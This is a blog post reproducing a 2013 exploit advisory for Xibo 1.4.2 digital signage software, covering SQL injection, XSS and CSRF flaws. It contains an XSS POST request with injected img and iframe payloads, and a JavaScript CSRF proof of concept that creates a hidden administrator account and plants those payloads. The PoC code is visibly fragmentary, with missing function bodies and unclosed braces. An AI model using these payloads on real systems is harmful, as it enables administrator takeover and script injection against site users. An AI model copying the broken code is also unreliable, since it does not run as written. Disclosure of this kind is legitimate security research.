Wednesday, August 21, 2013

[Exploit] Xibo - Digital Signage SQL Injection, XSS, CSRF

# Title: Xibo - Digital Signage SQL Injection, XSS, CSRF
# Discovered and Reported: July 2013
# Discovered/Exploited By: Jacob Holcomb/Gimppy, Security Analyst @ Independent Security Evaluators
# Exploit/Advisory:
# Software: Xibo 1.4.2 -
# Version Tested: Xibo 1.4.2 (Other versions were not tested and may be vulnerable.)
# CVE: SQL Injection - CVE-2013-4887, XSS - CVE-2013-4888, CSRF - CVE-2013-4889

SQL Injection Vulnerability - CVE-2013-4887
 Figure 1 - JSON Error

Figure 2 - Xibo application log containing a SQL error that corresponds to JSON error

Figure 3 - JSON data containing the result of a successful SQL query

Figure 4 - Client side HTML code was modified to reflect the query demonstrated in figure 3

Cross-Site Scripting (XSS) Vulnerability - CVE-2013-4888

POST:  /index.php?p=layout&q=add&ajax=true
Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D''+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0

Figure 5 - JSON data indicating a successful request

Figure 6 - Rendered page containing injected HTML iframe and img tags

Cross-Site Request Forgery (CSRF) Vulnerability - CVE-2013-4889

The following JavaScript PoC will create an Xibo administrative user and also set the XSS payloads discussed above.

<title> Xibo - Digital Signage 1.4.2 CSRF Exploit.</title>
# CSRF Discovered by: Jacob Holcomb - Security Analyst @ Independent Security Evaluators
# Exploited by: Jacob Holcomb - Security Analyst @ Independnet Security Evaluators
# CVE: CSRF - CVE-2013-4889, XSS - CVE-2013-4888
<h1>Please wait... </h1>
<script type="text/javascript">
//Add super user
function RF1(){
    document.write('<form name="addAdmin" target ="_blank" action="" method="post">'+
    '<input type="hidden" name="userid" value="0">'+
    '<input type="hidden" name="username" value="Gimppy">'+
    '<input type="hidden" name="password" value="ISE">'+
    '<input type="hidden" name="email" value="">'+
    '<input type="hidden" name="usertypeid" value="1">'+
    '<input type="hidden" name="groupid" value="1">'+

//Set XSS Payloads
function RF2(){
    document.write('<form name="addXSS" target="_blank" action="" method="post">'+
    '<input type="hidden" name="layoutid" value="0">'+
    '<input type="hidden" name="layout" value="Gimppy<img src=42 onerror=\'alert(42)\'>">'+
    '<input type="hidden" name="description" value="<iframe src=\'\' width=100 height=1000</iframe>">'+
    '<input type="hidden" name="tags" value="">'+
    '<input type="hidden" name="templateid" value="0">'+

function createPage(){

function _addAdmin(){

function _addXSS(){

//Called Functions
for (var i = 0; i < 2; i++){
    if(i == 0){
        window.setTimeout(_addAdmin, 0500);
    else if(i == 1){
        window.setTimeout(_addXSS, 1000);


  1. I have read this post. collection of post is a nice one. Thank you for this great sharing. Digital Signage.

  2. This comment has been removed by the author.